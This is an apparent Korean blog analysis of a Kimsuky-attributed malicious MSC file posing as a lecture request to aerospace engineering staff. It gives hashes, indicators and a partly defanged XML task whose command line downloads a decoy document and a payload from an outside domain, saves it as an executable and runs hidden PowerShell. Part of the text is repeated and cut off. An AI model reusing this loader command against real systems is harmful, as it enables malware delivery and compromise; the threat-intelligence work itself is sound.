항공우주공학 부분을 노리는 김수키(Kimsuky)만든 악성코드-강의의뢰서(2024.8.29)
Contents
오늘은 김수키(Kimsuky) 에서 만든 항공우주공학과 관련자 타겟팅 악성코드인 강의의뢰서(2024.8.29)에 대해 알아보겠습니다. 요즈음 Kimsuky(김수키)가 보니 카이스트 항공우주공학과 방효충 교수님께 강연하는 것처럼 보내는 메일로 공격한 것을 추정되는 악성코드에 대해 분석을 해보겠습니다. 일단 2024.8.30 에 적은 악성코드하고 똑같은데 해쉬값이 틀리고 동작은 똑같습니다.
먼저 해쉬값은 다음과 같습니다.
파일명:강의의뢰서.MS
사이즈:142 KB
MD5:bec918dd7c6f9d09f6cb4caeeee6fe03
SHA-1:10ec70cd8e388e2640364ee95e432c2a33822670
SHA-256:83457462d1885acce9f4e46ad4053d050d3b0c7f3935b61f378e52f0eed5a68b
입니다.
일단 실행을 시켜주면 msc로 실행이 되는것을 확인을 할수가 있으며 해당 부분은 노트 패드++로 열며 다음과 같은 결과를 확인을 할수가 있습니다.
<ConsoleTaskpads>
<ConsoleTaskpad ListSize="Medium" IsNodeSpecific="true" ReplacesDefault(V)iew=
"true" NoR(e)sults="true" Descri(p)tionsAsText="true" NodeType="{C96401CE(-)0E1
7-11D3-8(8)5B-00C(0)4F72C717}" ID="{656F3A6A-(1)A63-4FC4-9C9B-(4)B75AF6DF3A3}">
<String Name="Name" I(D)="19"/>
<String Name="Descriptio(n)" Value=""/>
<String Name="Tooltip" Va(l)ue=""/>
<Tasks>
<Task Type="Command(L)ine" Command="cmd(.)exe">
<String Name="Na(m)e" ID="18"/>
<String Name="Descr(i)ption" ID="28"/>
<Symbol>
<Image Name="Sma(l)l" Binar(y)RefIndex="6"/>
<Image Name="L(a)rge" BinaryRef(I)ndex="7"/>
</Symbol>
<CommandLine Direct(o)ry="" WindowState="Mi(n)imized" Params="/c mode 15,1
&curl -o "%t(e)mp%\Grieco Kava(n)agh Passive Supporters(.)docx"
; "hxxp://rem(.)zoom-meeting(.)kro(.)kr/0829_pprb/d(.)php?na=view"
&"%temp%\Grieco Kavanagh Passive Supporters(.)docx"&powers
hell -windowstyle hidden $a=1&curl -o "%appdata%\pest(&)quot; "
;hxxp://rem(.)zoom-meeting(.)kro(.)kr/0829_pprb/d(.)php?na=myapp"&t
ype "%appdata%\pest">"%appdata%\pest(.)exe"&
</Tasks>
코드 분석
1.ConsoleTaskpad 태그:해당 부분에서는 콘솔 작업 패드의 속성들을 정의
예를 들어 ListSize,IsNodeSpecific,ReplacesDefaultView,NoResults,DescriptionsAsText 등 다양한 속성들이 설정되어 있으며 해당 속성들은 주로 콘솔 작업 패드의 시각적 구성이나 동작 방식을 제어하는 데 사용
2.Tasks 태그:해당 부분에서는 실제로 수행할 작업을 정의
CommandLine 유형의 작업을 정의하고 있으며 여기서 악성 코드가 실행
cmd.exe:cmd.exe를 실행하도록 설정
Params:해당 …
먼저 해쉬값은 다음과 같습니다.
파일명:강의의뢰서.MS
사이즈:142 KB
MD5:bec918dd7c6f9d09f6cb4caeeee6fe03
SHA-1:10ec70cd8e388e2640364ee95e432c2a33822670
SHA-256:83457462d1885acce9f4e46ad4053d050d3b0c7f3935b61f378e52f0eed5a68b
입니다.
일단 실행을 시켜주면 msc로 실행이 되는것을 확인을 할수가 있으며 해당 부분은 노트 패드++로 열며 다음과 같은 결과를 확인을 할수가 있습니다.
<ConsoleTaskpads>
<ConsoleTaskpad ListSize="Medium" IsNodeSpecific="true" ReplacesDefault(V)iew=
"true" NoR(e)sults="true" Descri(p)tionsAsText="true" NodeType="{C96401CE(-)0E1
7-11D3-8(8)5B-00C(0)4F72C717}" ID="{656F3A6A-(1)A63-4FC4-9C9B-(4)B75AF6DF3A3}">
<String Name="Name" I(D)="19"/>
<String Name="Descriptio(n)" Value=""/>
<String Name="Tooltip" Va(l)ue=""/>
<Tasks>
<Task Type="Command(L)ine" Command="cmd(.)exe">
<String Name="Na(m)e" ID="18"/>
<String Name="Descr(i)ption" ID="28"/>
<Symbol>
<Image Name="Sma(l)l" Binar(y)RefIndex="6"/>
<Image Name="L(a)rge" BinaryRef(I)ndex="7"/>
</Symbol>
<CommandLine Direct(o)ry="" WindowState="Mi(n)imized" Params="/c mode 15,1
&curl -o "%t(e)mp%\Grieco Kava(n)agh Passive Supporters(.)docx"
; "hxxp://rem(.)zoom-meeting(.)kro(.)kr/0829_pprb/d(.)php?na=view"
&"%temp%\Grieco Kavanagh Passive Supporters(.)docx"&powers
hell -windowstyle hidden $a=1&curl -o "%appdata%\pest(&)quot; "
;hxxp://rem(.)zoom-meeting(.)kro(.)kr/0829_pprb/d(.)php?na=myapp"&t
ype "%appdata%\pest">"%appdata%\pest(.)exe"&
</Tasks>
코드 분석
1.ConsoleTaskpad 태그:해당 부분에서는 콘솔 작업 패드의 속성들을 정의
예를 들어 ListSize,IsNodeSpecific,ReplacesDefaultView,NoResults,DescriptionsAsText 등 다양한 속성들이 설정되어 있으며 해당 속성들은 주로 콘솔 작업 패드의 시각적 구성이나 동작 방식을 제어하는 데 사용
2.Tasks 태그:해당 부분에서는 실제로 수행할 작업을 정의
CommandLine 유형의 작업을 정의하고 있으며 여기서 악성 코드가 실행
cmd.exe:cmd.exe를 실행하도록 설정
Params:해당 …
IoC
10ec70cd8e388e2640364ee95e432c2a33822670
83457462d1885acce9f4e46ad4053d050d3b0c7f3935b61f378e52f0eed5a68b
http://rem.zoom-meeting.kro.kr
83457462d1885acce9f4e46ad4053d050d3b0c7f3935b61f378e52f0eed5a68b
http://rem.zoom-meeting.kro.kr